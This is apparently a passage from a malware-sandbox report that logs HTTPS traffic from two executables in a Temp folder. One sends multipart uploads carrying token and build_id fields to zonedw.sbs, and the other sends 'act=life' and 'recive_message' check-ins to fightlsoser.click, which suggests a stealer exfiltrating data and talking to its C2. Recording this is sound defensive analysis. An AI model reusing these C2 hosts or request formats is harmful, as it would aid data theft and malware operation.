                                                                                                                                                                                                                                                2024-12-13 12:53:20 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                31192.168.2.449965116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:23 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BI5PPPZMGLN7YUA168GL
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 100997
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:53:23 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 42 49 35 50 50 50 5a 4d 47 4c 4e 37 59 55 41 31 36 38 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 42 49 35 50 50 50 5a 4d 47 4c 4e 37 59 55 41 31 36 38 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 42 49 35 50 50 50 5a 4d 47 4c 4e 37 59 55 41 31 36 38 47 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------BI5PPPZMGLN7YUA168GLContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------BI5PPPZMGLN7YUA168GLContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------BI5PPPZMGLN7YUA168GLCont
                                                                                                                                                                                                                                                2024-12-13 12:53:23 UTC16355OUTData Raw: 69 69 6b 41 6c 46 4c 52 69 67 42 4b 53 6c 70 4b 42 68 51 61 4b 4b 59 78 4b 4b 57 69 6b 41 6c 46 4c 69 6b 6f 41 53 69 6c 70 4b 42 69 55 55 74 4a 51 4d 4b 53 6c 70 44 51 41 55 6c 4c 52 54 41 53 6b 4e 4c 52 51 4e 43 55 47 69 6a 46 41 78 4b 4b 57 6b 6f 41 4b 53 6c 70 4b 59 78 4b 51 30 36 6b 6f 47 4a 52 53 30 6c 41 78 4b 4b 57 6b 49 6f 41 53 67 30 55 55 61 44 45 6f 6f 6f 6f 47 4a 53 55 36 6b 78 52 63 42 4b 53 6e 59 70 70 6f 47 46 4a 53 30 55 44 47 6d 69 6c 70 4b 42 68 32 70 4b 58 46 4a 69 67 59 6c 4a 54 71 54 46 49 42 4b 53 6c 36 30 6c 41 78 4f 39 4a 32 70 31 49 52 51 55 49 61 53 6e 47 6b 49 6f 47 4e 36 47 69 6c 4e 4a 31 6f 41 54 72 53 45 55 37 47 4b 61 52 51 55 46 49 65 52 53 34 70 50 6f 4d 55 41 46 4a 53 34 35 7a 52 51 4d 62 52 53 30 6e 66 2b 74 41 78 44 79
                                                                                                                                                                                                                                                Data Ascii: iikAlFLRigBKSlpKBhQaKKYxKKWikAlFLikoASilpKBiUUtJQMKSlpDQAUlLRTASkNLRQNCUGijFAxKKWkoAKSlpKYxKQ06koGJRS0lAxKKWkIoASg0UUaDEooooGJSU6kxRcBKSnYppoGFJS0UDGmilpKBh2pKXFJigYlJTqTFIBKSl60lAxO9J2p1IRQUIaSnGkIoGN6GilNJ1oATrSEU7GKaRQUFIeRS4pPoMUAFJS45zRQMbRS0nf+tAxDy
                                                                                                                                                                                                                                                2024-12-13 12:53:23 UTC16355OUTData Raw: 6a 4b 6b 73 4b 38 47 33 70 65 36 39 65 71 2b 66 39 62 6e 4a 5a 72 6f 66 42 45 38 73 58 69 2b 78 45 52 2b 2b 7a 49 77 39 56 4b 6e 50 2b 50 34 55 79 62 77 50 34 6a 68 6e 38 72 2b 7a 6e 66 6e 41 64 48 55 71 66 78 7a 78 2b 4e 64 4e 34 65 30 4f 50 77 72 4f 62 6e 55 4a 59 6e 31 5a 34 7a 35 4e 74 47 64 33 6c 4b 65 72 4e 2f 4c 2f 48 74 39 62 6d 4f 59 59 61 6a 68 5a 7a 6c 4a 4e 57 5a 6e 68 63 4e 57 6c 57 69 72 57 31 4e 4b 36 43 70 65 54 49 76 33 56 6b 59 44 36 5a 72 41 38 53 41 47 77 69 50 63 53 67 66 6f 61 31 79 78 4a 4a 4a 79 54 79 61 35 2f 77 41 52 7a 67 74 44 41 44 30 79 37 66 30 2f 72 58 35 4e 77 7a 47 56 62 4f 4b 54 68 30 62 66 6f 72 50 2f 41 49 59 2b 6f 34 68 6e 47 6c 6c 6c 54 6d 36 70 4c 35 33 52 68 55 6e 4e 4c 52 58 37 57 66 6b 59 55 55 55 55 41 65 72 4d
                                                                                                                                                                                                                                                Data Ascii: jKksK8G3pe69eq+f9bnJZrofBE8sXi+xER++zIw9VKnP+P4UybwP4jhn8r+znfnAdHUqfxzx+NdN4e0OPwrObnUJYn1Z4z5NtGd3lKerN/L/Ht9bmOYYajhZzlJNWZnhcNWlWirW1NK6CpeTIv3VkYD6ZrA8SAGwiPcSgfoa1yxJJJyTya5/wARzgtDAD0y7f0/rX5NwzGVbOKTh0bforP/AIY+o4hnGlllTm6pL53RhUnNLRX7WfkYUUUUAerM
                                                                                                                                                                                                                                                2024-12-13 12:53:23 UTC16355OUTData Raw: 47 6d 47 6e 63 39 4f 31 4e 4a 35 6f 62 4e 45 4a 6e 67 34 70 75 66 78 70 54 30 70 70 36 35 71 47 55 67 7a 54 63 2b 6c 42 50 50 65 6b 49 71 53 68 44 36 30 6e 4e 4b 65 6c 4a 79 50 77 71 57 55 68 42 31 35 70 44 37 30 6f 35 6f 49 46 53 4d 54 39 4b 53 6a 71 66 65 67 6e 2f 49 70 44 45 50 4e 49 61 4d 55 6d 61 51 37 42 31 50 38 41 53 6b 50 54 4e 48 2b 65 61 4f 31 49 6f 39 41 6f 6f 6f 72 41 2b 55 43 69 75 74 74 50 42 61 33 56 6c 42 63 66 32 6b 71 65 62 47 72 37 66 4a 4a 78 6b 5a 78 31 71 4f 66 77 76 70 6c 72 4d 30 4e 78 34 6d 73 49 5a 56 78 6d 4f 55 71 72 44 49 79 4d 67 74 6e 6f 61 38 65 4f 62 78 6b 37 4b 44 5a 39 46 4c 68 79 70 46 58 64 52 49 35 61 69 75 6c 2f 34 52 2f 52 66 2b 68 73 30 76 38 41 37 2b 4a 2f 38 58 56 79 30 38 45 51 58 38 52 6c 73 39 63 74 72 69 4d
                                                                                                                                                                                                                                                Data Ascii: GmGnc9O1NJ5obNEJng4pufxpT0pp65qGUgzTc+lBPPekIqShD60nNKelJyPwqWUhB15pD70o5oIFSMT9KSjqfegn/IpDEPNIaMUmaQ7B1P8ASkPTNH+eaO1Io9AooorA+UCiuttPBa3VlBcf2kqebGr7fJJxkZx1qOfwvplrM0Nx4msIZVxmOUqrDIyMgtnoa8eObxk7KDZ9FLhypFXdRI5aiul/4R/Rf+hs0v8A7+J/8XVy08EQX8Rls9ctriM
                                                                                                                                                                                                                                                2024-12-13 12:53:23 UTC16355OUTData Raw: 72 4b 51 33 68 35 4e 62 6a 5a 50 76 48 70 55 66 31 70 32 63 34 39 4b 61 66 54 39 61 36 4c 6e 57 6c 6f 49 54 78 53 48 38 61 4f 6e 65 69 6b 55 68 74 42 34 50 61 67 6e 42 6f 6f 4b 41 2b 35 78 54 65 6c 4f 70 76 66 69 6b 4d 4f 2f 4e 42 50 48 2b 46 41 4e 49 65 66 65 6b 41 6e 35 55 6d 66 71 66 65 6c 70 4d 55 46 42 39 61 51 6a 36 55 76 58 38 36 51 2b 39 41 43 44 6e 32 39 36 4b 41 4f 61 42 79 61 42 69 64 42 52 51 54 6e 36 55 47 67 5a 36 4c 52 52 52 57 5a 38 67 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 43 69 69 69 69 6b 41 55 55 55 55 41 46 46 46 46 4d 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 4b 58 74 53 55 41 46 46 46 46 41 43 55 55 74 46 41 78 4b 4b 4b 4f 4b 41 43 69 6c 6f 70 67 4a 52 53 30 55 41 4a 52 53 30 55 41 4a 52 52 69 69
                                                                                                                                                                                                                                                Data Ascii: rKQ3h5NbjZPvHpUf1p2c49KafT9a6LnWloITxSH8aOneikUhtB4PagnBooKA+5xTelOpvfikMO/NBPH+FANIefekAn5UmfqfelpMUFB9aQj6UvX86Q+9ACDn296KAOaByaBidBRQTn6UGgZ6LRRRWZ8gFFFFABRRRQAUUUUAFFFFACiiiikAUUUUAFFFFMAooooAKKKKAEooooAKKXtSUAFFFFACUUtFAxKKKOKACilopgJRS0UAJRS0UAJRRii
                                                                                                                                                                                                                                                2024-12-13 12:53:23 UTC16355OUTData Raw: 64 51 4d 68 6d 2b 2b 50 70 55 59 71 53 62 37 34 2b 6c 52 6a 69 74 46 73 5a 79 33 44 46 46 42 49 70 4b 59 68 61 4b 51 30 6c 41 78 53 61 51 6d 69 67 30 41 4a 52 52 53 47 67 59 55 55 55 55 44 43 6b 7a 53 30 6c 41 42 52 52 53 47 67 59 55 55 55 47 67 42 4b 4b 4b 4b 42 69 55 55 55 47 67 41 4e 4a 53 39 71 53 6d 4d 53 69 69 67 30 41 4a 52 52 52 51 4d 53 69 69 69 67 59 55 6c 42 6f 6f 41 51 30 55 55 47 6d 4d 53 67 39 4b 4b 44 30 6f 47 4a 52 52 52 51 4d 53 69 69 69 67 42 4b 53 6c 70 4b 42 69 47 69 67 30 55 44 41 30 6c 4b 61 53 67 42 4b 53 6c 70 44 51 55 46 4a 53 30 6c 41 77 70 4b 57 6b 6f 47 4a 51 61 4b 44 51 41 6c 46 46 4a 51 4d 4b 53 6c 70 4b 42 69 55 55 55 55 44 45 70 44 53 30 6c 41 77 4e 4a 53 6d 6b 6f 47 4a 51 61 4b 44 51 41 30 30 55 47 69 6d 4d 44 53 5a 70 54
                                                                                                                                                                                                                                                Data Ascii: dQMhm++PpUYqSb74+lRjitFsZy3DFFBIpKYhaKQ0lAxSaQmig0AJRRSGgYUUUUDCkzS0lABRRSGgYUUUGgBKKKKBiUUUGgANJS9qSmMSiig0AJRRRQMSiiigYUlBooAQ0UUGmMSg9KKD0oGJRRRQMSiiigBKSlpKBiGig0UDA0lKaSgBKSlpDQUFJS0lAwpKWkoGJQaKDQAlFFJQMKSlpKBiUUUUDEpDS0lAwNJSmkoGJQaKDQA00UGimMDSZpT
                                                                                                                                                                                                                                                2024-12-13 12:53:23 UTC2867OUTData Raw: 4a 49 73 72 50 4a 50 49 38 75 39 63 62 57 38 77 73 58 42 47 42 67 67 38 64 71 47 38 4f 61 61 39 6f 74 73 79 58 44 4b 73 76 6e 4c 49 62 75 55 79 68 38 59 79 4a 64 32 38 63 63 64 65 6e 46 58 2f 74 64 74 2f 77 41 2f 45 58 2f 66 59 6f 2b 31 32 33 2f 50 78 46 2f 33 32 4b 41 4b 56 74 34 65 30 75 30 56 56 67 74 64 6f 57 34 2b 31 44 39 34 78 4a 6c 32 37 64 35 4a 50 4a 49 36 35 36 6e 6b 38 38 30 74 7a 6f 4f 6e 58 64 2f 39 74 6b 69 6c 57 34 49 55 4f 30 4e 78 4a 45 4a 41 76 51 4f 46 59 42 77 4f 66 76 41 39 61 75 66 61 37 62 2f 6e 34 69 2f 37 37 46 48 32 75 32 2f 35 2b 49 76 2b 2b 78 51 42 57 66 52 74 50 6b 74 6e 74 32 74 38 78 50 63 66 61 57 58 65 33 4d 6d 38 50 75 36 2f 33 67 44 6a 70 56 2b 6f 66 74 64 74 2f 77 41 2f 45 58 2f 66 59 6f 2b 31 32 33 2f 50 78 46 2f 33
                                                                                                                                                                                                                                                Data Ascii: JIsrPJPI8u9cbW8wsXBGBgg8dqG8Oaa9otsyXDKsvnLIbuUyh8YyJd28ccdenFX/tdt/wA/EX/fYo+123/PxF/32KAKVt4e0u0VVgtdoW4+1D94xJl27d5JPJI656nk880tzoOnXd/9tkilW4IUO0NxJEJAvQOFYBwOfvA9aufa7b/n4i/77FH2u2/5+Iv++xQBWfRtPktnt2t8xPcfaWXe3Mm8Pu6/3gDjpV+oftdt/wA/EX/fYo+123/PxF/3
                                                                                                                                                                                                                                                2024-12-13 12:53:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:25 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:53:25 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                32192.168.2.449977104.21.35.434437924C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:28 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Host: fightlsoser.click
                                                                                                                                                                                                                                                2024-12-13 12:53:28 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                2024-12-13 12:53:29 UTC1021INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:29 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=f7918ikgi89qm804b4hlfjk6mr; expires=Tue, 08-Apr-2025 06:40:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BbfMiiXUwINAXVWYhbVC1NmksYj5jNvwWA0dQLVYz4L2XKo7HPBjGVnMxClSW25Qu5ykRFThtZY3HAtDklM4ZSABUb8EVQkFJDjyxv8C%2F%2FnHm%2B2edArLl1e%2FJLVKs6iZILdbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f1618e69d681881-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1496&min_rtt=1487&rtt_var=577&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1865814&cwnd=238&unsent_bytes=0&cid=2fdd045b3b0ec68b&ts=934&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:53:29 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok
                                                                                                                                                                                                                                                2024-12-13 12:53:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                33192.168.2.449978116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:28 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----LX4EUSR1N7QQIMGVASR9
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:53:28 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 58 34 45 55 53 52 31 4e 37 51 51 49 4d 47 56 41 53 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 34 45 55 53 52 31 4e 37 51 51 49 4d 47 56 41 53 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 34 45 55 53 52 31 4e 37 51 51 49 4d 47 56 41 53 52 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------LX4EUSR1N7QQIMGVASR9Content-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------LX4EUSR1N7QQIMGVASR9Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------LX4EUSR1N7QQIMGVASR9Cont
                                                                                                                                                                                                                                                2024-12-13 12:53:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:29 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:53:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                34192.168.2.449985116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:31 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----L6XTRQ1VS0ZM7Q9HD26X
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:53:31 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 51 31 56 53 30 5a 4d 37 51 39 48 44 32 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 51 31 56 53 30 5a 4d 37 51 39 48 44 32 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 51 31 56 53 30 5a 4d 37 51 39 48 44 32 36 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------L6XTRQ1VS0ZM7Q9HD26XContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------L6XTRQ1VS0ZM7Q9HD26XContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------L6XTRQ1VS0ZM7Q9HD26XCont
                                                                                                                                                                                                                                                2024-12-13 12:53:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:31 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:53:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                35192.168.2.449987104.21.35.434437924C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:53:32 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 50
                                                                                                                                                                                                                                                Host: fightlsoser.click
                                                                                                                                                                                                                                                2024-12-13 12:53:32 UTC50OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 4d 42 73 54 77 2d 2d 49 6e 73 74 61 6c 6c 73 26 6a 3d
                                                                                                                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=cMBsTw--Installs&j=
                                                                                                                                                                                                                                                2024-12-13 12:53:33 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:33 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=rb6uv3ngmlilpimanni8l5ur1m; expires=Tue, 08-Apr-2025 06:40:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XyXOfvZWCRQOJ0sxro8gNfQNikJi6tAWrH9mV3LrxjEcyU020VIu4flbHvPzt32tyaVooOW5tVbp%2B9Lt180oX6m8mXGL0dwtWyTUotS%2FU9FDOwjxfA%2B8q85ezSyAmM49TQTqMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f1618fd4e9941b5-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1630&rtt_var=613&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=951&delivery_rate=1780487&cwnd=207&unsent_bytes=0&cid=81c0d9f5e92c1ad6&ts=1484&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:53:33 UTC351INData Raw: 34 39 31 63 0d 0a 56 7a 4e 54 6c 39 4e 46 30 69 70 38 59 49 2f 50 37 73 53 4f 51 45 6f 42 59 66 73 35 57 5a 51 34 47 67 74 31 37 76 34 44 4f 6e 38 73 45 53 57 31 36 58 48 2b 43 41 38 46 72 66 57 61 74 76 73 6c 5a 69 4d 41 6e 78 74 6a 38 6c 6c 32 65 42 44 43 33 48 56 58 58 57 31 56 4d 76 75 67 49 50 34 49 47 52 69 74 39 62 57 2f 72 43 55 6b 49 31 76 5a 58 44 50 32 57 58 5a 70 46 49 57 52 63 31 59 63 50 31 38 30 2f 37 59 6d 74 6b 73 51 44 65 71 71 69 36 58 6b 4c 69 4e 73 43 5a 59 62 64 62 5a 64 59 43 6c 50 7a 4c 4e 6d 54 68 34 61 55 69 44 38 38 54 6a 2b 55 56 34 46 34 65 33 55 35 75 38 6c 4b 47 30 48 6e 31 49 78 2f 46 42 2b 61 42 47 45 6a 6d 70 63 46 7a 39 52 4e 2f 36 38 4c 36 4a 47 47 67 72 68 72 49 47 6c 72 47 78 6f 5a 42 76 5a 41 33 75 6c 61 48 74 34 42
                                                                                                                                                                                                                                                Data Ascii: 491cVzNTl9NF0ip8YI/P7sSOQEoBYfs5WZQ4Ggt17v4DOn8sESW16XH+CA8FrfWatvslZiMAnxtj8ll2eBDC3HVXXW1VMvugIP4IGRit9bW/rCUkI1vZXDP2WXZpFIWRc1YcP180/7YmtksQDeqqi6XkLiNsCZYbdbZdYClPzLNmTh4aUiD88Tj+UV4F4e3U5u8lKG0Hn1Ix/FB+aBGEjmpcFz9RN/68L6JGGgrhrIGlrGxoZBvZA3ulaHt4B
                                                                                                                                                                                                                                                2024-12-13 12:53:33 UTC1369INData Raw: 2f 75 77 4b 72 42 61 46 67 6e 6d 71 4a 36 74 35 53 38 6c 59 77 36 54 56 44 6a 32 58 58 4a 6a 47 49 61 59 62 46 55 62 4e 56 46 78 75 2f 45 67 71 41 68 47 51 73 36 6f 6e 4b 48 67 4e 47 70 5a 51 34 59 56 49 72 5a 64 64 43 6c 50 7a 4a 52 6b 57 78 34 2b 58 6a 4c 39 75 6a 57 77 57 68 67 50 36 4c 2b 4b 6f 2b 49 6f 4b 33 45 4a 6c 31 30 34 2f 31 46 78 62 42 43 49 33 43 38 59 47 69 30 52 61 62 57 51 4b 72 74 45 46 42 58 74 37 5a 50 6f 39 57 49 76 62 30 50 42 47 7a 2f 33 58 6e 6c 74 47 59 4b 59 62 56 34 54 4f 46 34 33 2f 37 45 67 75 6b 41 57 41 2b 43 6d 67 36 62 70 4c 79 78 6c 44 35 68 65 65 37 67 61 66 33 46 58 31 4e 78 50 58 78 34 6e 45 77 54 32 76 79 6d 33 58 6c 34 64 6f 37 54 4d 6f 65 42 69 63 43 4d 4e 6e 46 51 70 39 30 68 39 5a 77 57 41 6d 57 64 56 48 6a 74 52
                                                                                                                                                                                                                                                Data Ascii: /uwKrBaFgnmqJ6t5S8lYw6TVDj2XXJjGIaYbFUbNVFxu/EgqAhGQs6onKHgNGpZQ4YVIrZddClPzJRkWx4+XjL9ujWwWhgP6L+Ko+IoK3EJl104/1FxbBCI3C8YGi0RabWQKrtEFBXt7ZPo9WIvb0PBGz/3XnltGYKYbV4TOF43/7EgukAWA+Cmg6bpLyxlD5hee7gaf3FX1NxPXx4nEwT2vym3Xl4do7TMoeBicCMNnFQp90h9ZwWAmWdVHjtR
